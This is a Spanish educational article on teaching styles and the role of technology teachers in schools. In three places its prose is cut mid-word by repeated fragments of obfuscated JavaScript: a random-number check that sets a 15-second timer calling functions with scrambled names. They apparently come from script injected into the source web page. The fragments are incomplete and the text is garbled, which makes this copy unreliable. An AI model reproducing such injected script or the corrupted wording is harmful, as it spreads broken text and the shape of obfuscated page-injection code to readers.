CARACTERÍSTICAS DEL PROFESORADO: TECNOLOGÍA

Autora: Rocío Caballero Morenas

Como bien sabemos, la finalidad de la tarea de todo docente es el aprendizaje de los alumnos. Para ello se esmeran en la consecución de objetivos, buscandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando métodos de trabajo y actividades a realizar que puedan motivar a los alumnos y hacerles comprender el contenido a estudiar.

En esta búsqueda de un fin común, podemos encontrarnos diferentes tipos de profesores, que utilizan diferentes metodologías en las aulas. Estas, son fruto, entre otras cosas, de la personalidad del profesor, la asignatura a impartir o la forma de ser de los alumnos.

TIPOS DE PROFESORES

Aunque todos los profesores buscan el mismo fin, el camino por el que llegan a él, puede ser muy diferente. Así, podemos encontrarnos al profesor “magistral”, que utiliza un método de enseñanza en el que da más importancia a los conocimientos a transmitir y menos importancia a la participación del alumno. Simplemente explica los conceptos, y los alumnos han de asumirlos.

En contraposición, podemos encontrarnos al profesor “procesual”, quien da más importancia a la comprensión de los contenidos y procesos por parte de los alumnos, y a que ellos desarrollen actividades por sí mismos. Lo cual no quiere decir que los conceptos a transmitir no sean importantes, pero quedan en segundo lugar, elevandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando así al alumno al primero.

PROFESORES DE TECNOLOGÍA

Podemos considerar la asignatura de Tecnología un tanto “especial” respecto a las demás. Con ello no queremos decir que tenga más ni menos importancia que ninguna otra, sino que es algo diferente en su desarrollo, ya que cuenta con una parte en la que los alumnos crean desde cero sus propios proyectos. Esto lo logran haciendo uso de los conocimientos teóricos adquiridos, su imaginación, creatividad y destreza en el uso de materiales.

Una de las funciones más importantes del profesorado de tecnología es la de proporcionar los conocimientos necesarios a los alumnos para que ellos sean capaces de desarrollar por sí mismos. Es ser orientador, un guía que enseña al alumno a moverse en un mundo inundado de información, a buscar y utilizar datos necesarios y a definir los criterios idóneos para tomar una decisión.

Un profesor de tecnología debe tener capacidad para percibir nexos entre necesidades y recursos, entre recursos y procedimientos y entre procedimientos y resultados; así como resolver situaciones problemáticas.

También, debe ayudar a los alumnos a transformar ideas en procedimientos, y a generar estrategias personales de solución de situaciones reales; así como a adquirir una actitud crítica y constructiva respecto de las soluciones.

El profesor de Tecnología tiene que ser capaz de ver trabajar a sus alumnos y no intervenir en el diseño aunque tenga ideas mejores. Además, debe dejar que sean los alumnos solos quienes, mediante pruebas y experimentos, lleguen a la conclusión de por qué o por qué no funciona un proyecto, y averiguar cuál es la solución más adecuada.

Todo esto no significa que el profesor no pueda dar pistas o “consejillos” para mejorar las ideas o procedimientos de los proyectos. Se puede sugerir, pero siempre dejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que sean ellos quienes tomen las decisiones.

Por otra parte, un profesor de tecnología debe saber valorar el trabajo de sus alumnos. No siempre el trabajo que parece mejor realizado es el que ha requerido más esfuerzo; por eso además del resultado final, debe valorarse el esfuerzo, trabajo, implicación y ganas que cada alumno pone en la elaboración del proyecto.

CONCLUSIÓN

A pesar de que en el panorama docente podemos encontrar mucha variedad de profesores en cuanto a su metodología, podemos decir que cada uno imparte las clases en la forma que considera más correcta según su criterio. El cual, no es mejor ni peor que ninguno.

Es cierto, que cada profesor guía sus clases en base a los contenidos y objetivos, que pueden variar de unas asignaturas a otras, lo que implica el uso de diferentes metodologías según las necesidades.

BIBLIOGRAFÍA

http://www2.gobiernodecanarias.org/educacion/17/WebC/Apdorta/can-tecn.htm

http://cab.cnea.gov.ar/gaet/salta.pdf

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